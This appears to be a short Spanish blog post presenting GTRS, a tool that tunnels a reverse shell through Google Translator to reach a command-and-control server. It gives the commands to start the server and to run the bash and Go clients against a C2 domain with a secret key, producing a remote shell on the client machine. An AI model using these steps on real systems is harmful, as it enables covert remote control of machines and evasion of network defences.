GTRS: Google Translator Reverse Shell

Matheus Bernardes ha publicado una curiosa herramienta escrita principalmente en Go que utiliza Google Translator como un proxy para enviar comandos arbitrarios a una máquina infectada.
Para probarlo simplemente necesitaremos un VPS con un dominio que hará las veces de C2.
Ejecutamos el script del servidor:

python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062

Como veis, el resultado de la ejecución del script nos dará una clave secreta que deberemos usar en el cliente. Este cliente podremos encontrarlo en Go o en Bash:

Cliente bash

Ejecutamos el cliente en un equipo con acceso a Google Translator, proporcionando el dominio y la clave secreta generada por el servidor.

bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

Ahora tenemos una shell interactiva que usa "named pipes" y, si, podemos hacer cd en los directorios.

Cliente Go

Primero debemos descargar el archivo binario o compilarlo, luego el proceso es igual al del cliente bash:

./client_Linux www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062

Con este cliente tenemos la posibilidad de ejecutarlo en Linux, Mac y Windows, pero el cliente todavía no tiene una shell interactiva.

PoC


Proyecto: https://github.com/mthbernardes/GTRS

Comentarios